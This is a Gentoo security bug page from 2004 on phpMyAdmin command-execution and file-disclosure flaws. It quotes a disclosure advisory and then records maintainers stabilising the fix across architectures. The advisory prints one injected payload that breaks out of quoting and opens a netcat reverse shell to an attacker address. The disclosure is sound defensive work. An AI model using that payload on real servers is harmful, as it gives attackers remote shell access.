Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 74303 - dev-db/phpmyadmin: Multiple vulnerabilities
Summary: dev-db/phpmyadmin: Multiple vulnerabilities
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High normal (vote)
Assignee: Gentoo Security
Whiteboard: B1 [glsa] jaervosz
Depends on:
Reported: 2004-12-13 10:23 UTC by Aarni Honka
Modified: 2004-12-19 12:24 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Aarni Honka 2004-12-13 10:23:49 UTC

                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148

Overview :

phpMyAdmin is a tool written in PHP intended to handle the 
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.

Technical details :

Command execution :

	- bug introduced in 2.6.0-pl2
	- attacker does *not* need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- external transformations must be activated
	- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

	- attacker need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- $cfg['UploadDir'] must be defined
	- exploitation is done via 'sql_localfile'

Vendor Response :

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two

Recommendation :

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.

CVE Information :

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (, which standardizes 
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin
Comment 1 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2004-12-13 11:33:22 UTC
Tom please advise.
Comment 2 Tom Payne (RETIRED) gentoo-dev 2004-12-14 03:44:18 UTC
2.6.1_rc1 contains fix. Stable on x86. Other arches, please mark stable.


Comment 3 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2004-12-14 04:01:43 UTC
Thx Tom,

Arches please mark 2.6.1_rc1 stable.
Comment 4 Guy Martin (RETIRED) gentoo-dev 2004-12-14 06:49:39 UTC
Stable on hppa.
Comment 5 Bryan Østergaard (RETIRED) gentoo-dev 2004-12-14 14:21:35 UTC
Alpha stable.
Comment 6 Jason Wever (RETIRED) gentoo-dev 2004-12-14 17:39:11 UTC
Comment 7 Jochen Maes (RETIRED) gentoo-dev 2004-12-14 22:49:08 UTC
stable on PPC
Comment 8 Jochen Maes (RETIRED) gentoo-dev 2004-12-15 04:19:19 UTC
forgot to remove the mail
Comment 9 Simon Stelling (RETIRED) gentoo-dev 2004-12-16 11:06:32 UTC
amd64 done
Comment 10 Thierry Carrez (RETIRED) gentoo-dev 2004-12-17 14:25:54 UTC
Ready to go
Comment 11 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2004-12-19 12:24:19 UTC
GLSA 200412-19